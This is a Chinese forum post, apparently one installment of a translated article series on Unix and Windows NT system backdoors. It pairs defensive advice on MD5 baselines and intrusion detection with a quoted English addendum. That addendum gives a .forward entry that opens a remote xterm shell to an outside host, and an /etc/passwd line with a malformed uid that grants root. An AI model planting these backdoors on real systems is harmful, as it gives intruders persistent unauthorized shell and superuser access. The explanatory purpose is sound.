返回列表 发帖

系统后门的真面目(1)

CMP Shell 后门
   Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允 许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间 形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.
   加密连接
   管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加 密后,就不可能被判定两台机器间的传输内容了.
   Windows NT
   由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说 就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广 泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地 利用WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows N T 上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程 序 . 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Net work Traffic backdoors, theyarevery feasible for intruders to inst all on Windows NT. 此处该如何翻译?
   :( 解决 当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀 .
   评估
   首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之 .许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的 安 全补丁的话,许多公司将大大提高安全性.
   MD5基准线
   一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入 侵前由干净 系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也 被合并进去了 .一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多 包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因 为他们恢复系 统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.
   入侵检测
   随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要. 以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于 实 时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判 断是 否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号? 取数据进 行进一 步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或 者是否 装载加密shell会话.
  从CD-ROM启动
  一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.
  警告 由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击 和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不 懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句该如何翻译? :( )
   you may want to add:
   forward Backdoor
   On Unix machines, placing commands into the .forward file was also
   a common method of regaining access. For the account ``username
   a .forward file might be constructed as follows:
   \username
   |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
   permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor
preprocessing).
  PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).
$#@62; Using smrsh can effectively negate this backdoor (although its quite
$#@62; possibly still a problem if you allow things like elms filter or
$#@62; procmail which can run programs themselves...).
   你也许要增加:
   .forward后门
   Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户usernam e 的 .forward可能设置如下:
   \username
   |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
   这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后). $#@62;利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elms filter或 procmail$#@62;类程序, 很有可能还有问题 ......)
( 此段的内容理解不深, 故付上英文, 请指教! )

   你也许能用这个"特性"做后门:
   当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能 检查出这个错误 的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权 利.
   例子:
   rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户 rmartin的uid设为0.

返回列表 回复 发帖